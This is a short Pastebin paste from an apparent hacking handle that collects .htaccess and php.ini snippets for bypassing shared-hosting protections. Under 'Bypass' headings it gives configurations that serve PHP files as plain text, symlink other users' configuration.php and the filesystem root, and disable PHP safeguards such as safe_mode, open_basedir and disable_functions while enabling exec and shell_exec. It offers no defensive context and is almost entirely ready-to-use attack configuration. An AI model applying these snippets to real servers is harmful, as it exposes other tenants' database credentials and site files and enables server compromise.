Advertisement
CoderSec

All about .htaccess

Nov 1st, 2014
4,399
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.38 KB | None | 0 0
  1. Follow me #PASTEBIN and #YOUTUBE also Contact :* ^_^
  2.  
  3. @Contact - : https://www.facebook.com/NurIzzahAfiqahII
  4.  
  5. @Pastebin - : http://pastebin.com/u/CoderSec
  6.  
  7. @Youtube - : http://www.youtube.com/user/Dinz011
  8.  
  9. - [ Bypass Directory ]-
  10. <Directory "/home/user/public_html">
  11. Options -ExecCGI
  12. AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
  13. </Directory>
  14.  
  15. - [ Include symlink ]-
  16. Options Indexes FollowSymLinks
  17. DirectoryIndex ssssss.htm
  18. AddType txt .php
  19. AddHandler txt .php
  20.  
  21. - [ Bypass Litespeed ] -
  22. wew.shtml
  23. do ==> ln -ls /home/user/public_html/configuration.php wew.shtml
  24. .htaccess
  25. Options +FollowSymLinks
  26. DirectoryIndex chesss.html
  27. RemoveHandler .php
  28. AddType application/octet-stream .php
  29.  
  30. - [ Bypass OVH ]-
  31. .htaccess
  32. Options +FollowSymLinks
  33. DirectoryIndex Index.html
  34. Options +Indexes
  35. AddType text/plain .php
  36. AddHandler server-parsed .php
  37. AddType root .root
  38. AddHandler cgi-script .root
  39. AddHandler cgi-script .root
  40. php.ini
  41. safe_mode = Off
  42. disable_functions =
  43. safe_mode_gid = Off
  44. open_basedir = Off
  45. register_globals = on
  46. exec = On
  47. shell_exec = On
  48. ln -s / CoderSec
  49.  
  50. - [ Bypass Symlink 403 forbidden ] -
  51. .htaccess
  52. Options all
  53. DirectoryIndex Sux.html
  54. AddType text/plain .php
  55. AddHandler server-parsed .php
  56. AddType text/plain .html
  57. AddHandler txt .html
  58. Require None
  59. Satisfy Any
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement